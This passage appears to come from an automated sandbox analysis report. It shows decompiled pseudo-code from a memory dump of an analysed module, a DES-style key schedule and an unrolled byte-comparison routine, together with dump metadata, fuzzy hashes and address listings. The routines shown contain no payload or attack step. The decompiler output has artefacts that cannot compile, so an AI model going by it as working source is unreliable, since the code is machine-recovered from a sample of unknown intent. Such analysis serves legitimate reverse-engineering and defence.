                                                                                                                                                      				_v16 =  *(0x10025d38 + (_v16 >> 0x00000001 & 0x0000000f) * 4) << 0x00000003 |  *(0x10025d38 + (_v16 >> 0x00000009 & 0x0000000f) * 4) << 0x00000002 |  *(0x10025d38 + (_v16 >> 0x00000011 & 0x0000000f) * 4) << 0x00000001 |  *(0x10025d38 + (_v16 >> 0x00000019 & 0x0000000f) * 4) |  *(0x10025d38 + (_v16 >> 0x00000004 & 0x0000000f) * 4) << 0x00000007 |  *(0x10025d38 + (_v16 >> 0x0000000c & 0x0000000f) * 4) << 0x00000006 |  *(0x10025d38 + (_v16 >> 0x00000014 & 0x0000000f) * 4) << 0x00000005 |  *(0x10025d38 + (_v16 >> 0x0000001c & 0x0000000f) * 4) << 0x00000004;
                                                                                                                                                      				_v20 = _v20 & 0x0fffffff;
                                                                                                                                                      				_t191 = _v16 & 0x0fffffff;
                                                                                                                                                      				_v16 = _t191;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				while(_v12 < 0x10) {
                                                                                                                                                      					if(_v12 < 2 || _v12 == 8 || _v12 == 0xf) {
                                                                                                                                                      						_v20 = (_v20 << 0x00000001 | _v20 >> 0x0000001b) & 0x0fffffff;
                                                                                                                                                      						_v16 = (_v16 << 0x00000001 | _v16 >> 0x0000001b) & 0x0fffffff;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v20 = (_v20 << 0x00000002 | _v20 >> 0x0000001a) & 0x0fffffff;
                                                                                                                                                      						_v16 = (_v16 << 0x00000002 | _v16 >> 0x0000001a) & 0x0fffffff;
                                                                                                                                                      					}
                                                                                                                                                      					 *_a4 = _v20 << 0x00000004 & 0x24000000 | _v20 << 0x0000001c & 0x10000000 | _v20 << 0x0000000e & 0x08000000 | _v20 << 0x00000012 & 0x02080000 | _v20 << 0x00000006 & 0x01000000 | _v20 << 0x00000009 & 0x00200000 | _v20 >> 0x00000001 & 0x00100000 | _v20 << 0x0000000a & 0x00040000 | _v20 << 0x00000002 & 0x00020000 | _v20 >> 0x0000000a & 0x00010000 | _v16 >> 0x0000000d & 0x00002000 | _v16 >> 0x00000004 & 0x00001000 | _v16 << 0x00000006 & 0x00000800 | _v16 >> 0x00000001 & 0x00000400 | _v16 >> 0x0000000e & 0x00000200 | _v16 & 0x00000100 | _v16 >> 0x00000005 & 0x00000020 | _v16 >> 0x0000000a & 0x00000010 | _v16 >> 0x00000003 & 0x00000008 | _v16 >> 0x00000012 & 0x00000004 | _v16 >> 0x0000001a & 0x00000002 | _v16 >> 0x00000018 & 0x00000001;
                                                                                                                                                      					_a4 =  &(_a4[1]);
                                                                                                                                                      					_t191 = _v16 >> 0x00000015 & 0x00000002;
                                                                                                                                                      					 *_a4 = _v20 << 0x0000000f & 0x20000000 | _v20 << 0x00000011 & 0x10000000 | _v20 << 0x0000000a & 0x08000000 | _v20 << 0x00000016 & 0x04000000 | _v20 >> 0x00000002 & 0x02000000 | _v20 << 0x00000001 & 0x01000000 | _v20 << 0x00000010 & 0x00200000 | _v20 << 0x0000000b & 0x00100000 | _v20 << 0x00000003 & 0x00080000 | _v20 >> 0x00000006 & 0x00040000 | _v20 << 0x0000000f & 0x00020000 | _v20 >> 0x00000004 & 0x00010000 | _v16 >> 0x00000002 & 0x00002000 | _v16 << 0x00000008 & 0x00001000 | _v16 >> 0x0000000e & 0x00000808 | _v16 >> 0x00000009 & 0x00000400 | _v16 & 0x00000200 | _v16 << 0x00000007 & 0x00000100 | _v16 >> 0x00000007 & 0x00000020 | _v16 >> 0x00000003 & 0x00000011 | _v16 << 0x00000002 & 0x00000004 | _t191;
                                                                                                                                                      					_a4 =  &(_a4[1]);
                                                                                                                                                      					_v12 = _v12 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _t191;
                                                                                                                                                      			}









                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 26d347caaebb4134736e1291c681f223ae3d06987f61639b05510bbde1db3ee8
                                                                                                                                                      • Instruction ID: f211c0cef621b5a291f88d0ae3a0398c0a586129dbe3d68e9b04f87971d5a04b
                                                                                                                                                      • Opcode Fuzzy Hash: 26d347caaebb4134736e1291c681f223ae3d06987f61639b05510bbde1db3ee8
                                                                                                                                                      • Instruction Fuzzy Hash: 71E13F71E104589BEB58CA5DC8957ADB7F3FB84340F24C669E13AE7289C674E606CB40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000BC57(void* __eax, void* __ecx) {
                                                                                                                                                      				void* _t183;
                                                                                                                                                      				signed int _t184;
                                                                                                                                                      				void* _t187;
                                                                                                                                                      				signed char _t193;
                                                                                                                                                      				signed char _t194;
                                                                                                                                                      				signed char _t195;
                                                                                                                                                      				signed char _t196;
                                                                                                                                                      				signed char _t198;
                                                                                                                                                      				signed int _t296;
                                                                                                                                                      				void* _t299;
                                                                                                                                                      				void* _t301;
                                                                                                                                                      				void* _t303;
                                                                                                                                                      				void* _t306;
                                                                                                                                                      				void* _t308;
                                                                                                                                                      				void* _t310;
                                                                                                                                                      				void* _t313;
                                                                                                                                                      				void* _t315;
                                                                                                                                                      				void* _t317;
                                                                                                                                                      				void* _t320;
                                                                                                                                                      				void* _t322;
                                                                                                                                                      				void* _t324;
                                                                                                                                                      				void* _t327;
                                                                                                                                                      				void* _t329;
                                                                                                                                                      				void* _t331;
                                                                                                                                                      				void* _t334;
                                                                                                                                                      				void* _t336;
                                                                                                                                                      				void* _t338;
                                                                                                                                                      
                                                                                                                                                      				_t187 = __ecx;
                                                                                                                                                      				_t183 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                                                                                      					_t296 = 0;
                                                                                                                                                      					L12:
                                                                                                                                                      					if(_t296 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t193 =  *(_t183 - 0x19);
                                                                                                                                                      					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                                                                                      						_t296 = 0;
                                                                                                                                                      						L23:
                                                                                                                                                      						if(_t296 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t194 =  *(_t183 - 0x15);
                                                                                                                                                      						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                                                                                      							_t296 = 0;
                                                                                                                                                      							L34:
                                                                                                                                                      							if(_t296 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t195 =  *(_t183 - 0x11);
                                                                                                                                                      							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                                                                                      								_t296 = 0;
                                                                                                                                                      								L45:
                                                                                                                                                      								if(_t296 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								_t196 =  *(_t183 - 0xd);
                                                                                                                                                      								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                                                                                      									_t296 = 0;
                                                                                                                                                      									L56:
                                                                                                                                                      									if(_t296 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                                                                                      										_t296 = 0;
                                                                                                                                                      										L67:
                                                                                                                                                      										if(_t296 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										_t198 =  *(_t183 - 5);
                                                                                                                                                      										if(_t198 ==  *(_t187 - 5)) {
                                                                                                                                                      											_t296 = 0;
                                                                                                                                                      											L78:
                                                                                                                                                      											if(_t296 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                                                                                      											if(_t184 != 0) {
                                                                                                                                                      												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                                                                                      											}
                                                                                                                                                      											L2:
                                                                                                                                                      											return _t184;
                                                                                                                                                      										}
                                                                                                                                                      										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                                                                                      										if(_t299 == 0) {
                                                                                                                                                      											L71:
                                                                                                                                                      											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                                                                                      											if(_t301 == 0) {
                                                                                                                                                      												L73:
                                                                                                                                                      												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                                                                                      												if(_t303 == 0) {
                                                                                                                                                      													L75:
                                                                                                                                                      													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                                                                                      													if(_t296 != 0) {
                                                                                                                                                      														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      													}
                                                                                                                                                      													goto L78;
                                                                                                                                                      												}
                                                                                                                                                      												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                                                                                      												if(_t296 != 0) {
                                                                                                                                                      													goto L1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L75;
                                                                                                                                                      											}
                                                                                                                                                      											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                                                                                      											if(_t296 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L73;
                                                                                                                                                      										}
                                                                                                                                                      										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                                                                                      										if(_t296 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L71;
                                                                                                                                                      									}
                                                                                                                                                      									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                                                                                      									if(_t306 == 0) {
                                                                                                                                                      										L60:
                                                                                                                                                      										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                                                                                      										if(_t308 == 0) {
                                                                                                                                                      											L62:
                                                                                                                                                      											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                                                                                      											if(_t310 == 0) {
                                                                                                                                                      												L64:
                                                                                                                                                      												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                                                                                      												if(_t296 != 0) {
                                                                                                                                                      													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L67;
                                                                                                                                                      											}
                                                                                                                                                      											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                                                                                      											if(_t296 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L64;
                                                                                                                                                      										}
                                                                                                                                                      										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                                                                                      										if(_t296 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L62;
                                                                                                                                                      									}
                                                                                                                                                      									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                                                                                      									if(_t296 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L60;
                                                                                                                                                      								}
                                                                                                                                                      								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                                                                                      								if(_t313 == 0) {
                                                                                                                                                      									L49:
                                                                                                                                                      									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                                                                                      									if(_t315 == 0) {
                                                                                                                                                      										L51:
                                                                                                                                                      										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                                                                                      										if(_t317 == 0) {
                                                                                                                                                      											L53:
                                                                                                                                                      											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                                                                                      											if(_t296 != 0) {
                                                                                                                                                      												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L56;
                                                                                                                                                      										}
                                                                                                                                                      										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                                                                                      										if(_t296 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L53;
                                                                                                                                                      									}
                                                                                                                                                      									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                                                                                      									if(_t296 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L51;
                                                                                                                                                      								}
                                                                                                                                                      								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                                                                                      								if(_t296 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L49;
                                                                                                                                                      							}
                                                                                                                                                      							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                                                                                      							if(_t320 == 0) {
                                                                                                                                                      								L38:
                                                                                                                                                      								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                                                                                      								if(_t322 == 0) {
                                                                                                                                                      									L40:
                                                                                                                                                      									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                                                                                      									if(_t324 == 0) {
                                                                                                                                                      										L42:
                                                                                                                                                      										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                                                                                      										if(_t296 != 0) {
                                                                                                                                                      											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L45;
                                                                                                                                                      									}
                                                                                                                                                      									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                                                                                      									if(_t296 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L42;
                                                                                                                                                      								}
                                                                                                                                                      								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                                                                                      								if(_t296 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L40;
                                                                                                                                                      							}
                                                                                                                                                      							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                                                                                      							if(_t296 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L38;
                                                                                                                                                      						}
                                                                                                                                                      						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                                                                                      						if(_t327 == 0) {
                                                                                                                                                      							L27:
                                                                                                                                                      							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                                                                                      							if(_t329 == 0) {
                                                                                                                                                      								L29:
                                                                                                                                                      								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                                                                                      								if(_t331 == 0) {
                                                                                                                                                      									L31:
                                                                                                                                                      									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                                                                                      									if(_t296 != 0) {
                                                                                                                                                      										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L34;
                                                                                                                                                      								}
                                                                                                                                                      								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                                                                                      								if(_t296 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L31;
                                                                                                                                                      							}
                                                                                                                                                      							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                                                                                      							if(_t296 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                                                      						if(_t296 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L27;
                                                                                                                                                      					}
                                                                                                                                                      					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                                                                                      					if(_t334 == 0) {
                                                                                                                                                      						L16:
                                                                                                                                                      						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                                                                                      						if(_t336 == 0) {
                                                                                                                                                      							L18:
                                                                                                                                                      							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                                                                                      							if(_t338 == 0) {
                                                                                                                                                      								L20:
                                                                                                                                                      								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                                                                                      								if(_t296 != 0) {
                                                                                                                                                      									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L23;
                                                                                                                                                      							}
                                                                                                                                                      							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                                                                                      							if(_t296 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L20;
                                                                                                                                                      						}
                                                                                                                                                      						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                                                                                      						if(_t296 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L18;
                                                                                                                                                      					}
                                                                                                                                                      					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                                                      					if(_t296 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L16;
                                                                                                                                                      				} else {
                                                                                                                                                      					__esi = __dl & 0x000000ff;
                                                                                                                                                      					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                                      					if(__esi == 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                                      						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                                      						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                                      						if(__esi == 0) {
                                                                                                                                                      							L7:
                                                                                                                                                      							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                                      							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                                      							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                                      							if(__esi == 0) {
                                                                                                                                                      								L9:
                                                                                                                                                      								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                                      								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                                      								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                                      								if(__esi != 0) {
                                                                                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L12;
                                                                                                                                                      							}
                                                                                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      							__esi = __edx;
                                                                                                                                                      							if(__edx != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L9;
                                                                                                                                                      						}
                                                                                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      						__esi = __edx;
                                                                                                                                                      						if(__edx != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      					__esi = __edx;
                                                                                                                                                      					if(__edx != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t184 = _t296;
                                                                                                                                                      				goto L2;
                                                                                                                                                      			}






























                                                                                                                                                      0x1000bf97
                                                                                                                                                      0x1000bf83
                                                                                                                                                      0x1000bf87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf87
                                                                                                                                                      0x1000bf62
                                                                                                                                                      0x1000bf66
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf66
                                                                                                                                                      0x1000bf41
                                                                                                                                                      0x1000bf45
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf45
                                                                                                                                                      0x1000bea2
                                                                                                                                                      0x1000bea4
                                                                                                                                                      0x1000bebb
                                                                                                                                                      0x1000bec3
                                                                                                                                                      0x1000bec5
                                                                                                                                                      0x1000bedc
                                                                                                                                                      0x1000bee4
                                                                                                                                                      0x1000bee6
                                                                                                                                                      0x1000befd
                                                                                                                                                      0x1000bf05
                                                                                                                                                      0x1000bf07
                                                                                                                                                      0x1000bf14
                                                                                                                                                      0x1000bf14
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bf07
                                                                                                                                                      0x1000bef3
                                                                                                                                                      0x1000bef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bef7
                                                                                                                                                      0x1000bed2
                                                                                                                                                      0x1000bed6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bed6
                                                                                                                                                      0x1000beb1
                                                                                                                                                      0x1000beb5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000beb5
                                                                                                                                                      0x1000be13
                                                                                                                                                      0x1000be15
                                                                                                                                                      0x1000be2c
                                                                                                                                                      0x1000be34
                                                                                                                                                      0x1000be36
                                                                                                                                                      0x1000be4d
                                                                                                                                                      0x1000be55
                                                                                                                                                      0x1000be57
                                                                                                                                                      0x1000be6e
                                                                                                                                                      0x1000be76
                                                                                                                                                      0x1000be78
                                                                                                                                                      0x1000be85
                                                                                                                                                      0x1000be85
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be78
                                                                                                                                                      0x1000be64
                                                                                                                                                      0x1000be68
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be68
                                                                                                                                                      0x1000be43
                                                                                                                                                      0x1000be47
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be47
                                                                                                                                                      0x1000be22
                                                                                                                                                      0x1000be26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000be26
                                                                                                                                                      0x1000bd84
                                                                                                                                                      0x1000bd86
                                                                                                                                                      0x1000bd9d
                                                                                                                                                      0x1000bda5
                                                                                                                                                      0x1000bda7
                                                                                                                                                      0x1000bdbe
                                                                                                                                                      0x1000bdc6
                                                                                                                                                      0x1000bdc8
                                                                                                                                                      0x1000bddf
                                                                                                                                                      0x1000bde7
                                                                                                                                                      0x1000bde9
                                                                                                                                                      0x1000bdf6
                                                                                                                                                      0x1000bdf6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bde9
                                                                                                                                                      0x1000bdd5
                                                                                                                                                      0x1000bdd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bdd9
                                                                                                                                                      0x1000bdb4
                                                                                                                                                      0x1000bdb8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bdb8
                                                                                                                                                      0x1000bd93
                                                                                                                                                      0x1000bd97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd97
                                                                                                                                                      0x1000bcf5
                                                                                                                                                      0x1000bcf7
                                                                                                                                                      0x1000bd0e
                                                                                                                                                      0x1000bd16
                                                                                                                                                      0x1000bd18
                                                                                                                                                      0x1000bd2f
                                                                                                                                                      0x1000bd37
                                                                                                                                                      0x1000bd39
                                                                                                                                                      0x1000bd50
                                                                                                                                                      0x1000bd58
                                                                                                                                                      0x1000bd5a
                                                                                                                                                      0x1000bd67
                                                                                                                                                      0x1000bd67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd5a
                                                                                                                                                      0x1000bd46
                                                                                                                                                      0x1000bd4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd4a
                                                                                                                                                      0x1000bd25
                                                                                                                                                      0x1000bd29
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bd29
                                                                                                                                                      0x1000bd04
                                                                                                                                                      0x1000bd08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000bc5f
                                                                                                                                                      0x1000bc5f
                                                                                                                                                      0x1000bc62
                                                                                                                                                      0x1000bc66
                                                                                                                                                      0x1000bc68
                                                                                                                                                      0x1000bc7f
                                                                                                                                                      0x1000bc7f
                                                                                                                                                      0x1000bc83
                                                                                                                                                      0x1000bc87
                                                                                                                                                      0x1000bc89
                                                                                                                                                      0x1000bca0
                                                                                                                                                      0x1000bca0
                                                                                                                                                      0x1000bca4
                                                                                                                                                      0x1000bca8
                                                                                                                                                      0x1000bcaa
                                                                                                                                                      0x1000bcc1
                                                                                                                                                      0x1000bcc1
                                                                                                                                                      0x1000bcc5
                                                                                                                                                      0x1000bcc9
                                                                                                                                                      0x1000bccb
                                                                                                                                                      0x1000bcd1
                                                                                                                                                      0x1000bcd4
                                                                                                                                                      0x1000bcd8

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                      • Instruction ID: 0ccd22ddf1786b0bbd96d4c0f79b37cb1226c86665694e5d33448657031624c6
                                                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                      • Instruction Fuzzy Hash: A9C16F73C0EDF34A9375C92D446862AEAA2DFC16D432BC7E1CCD43F29D99269D049AD0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000B883(void* __eax, void* __ecx) {
                                                                                                                                                      				void* _t177;
                                                                                                                                                      				signed int _t178;
                                                                                                                                                      				void* _t181;
                                                                                                                                                      				signed char _t187;
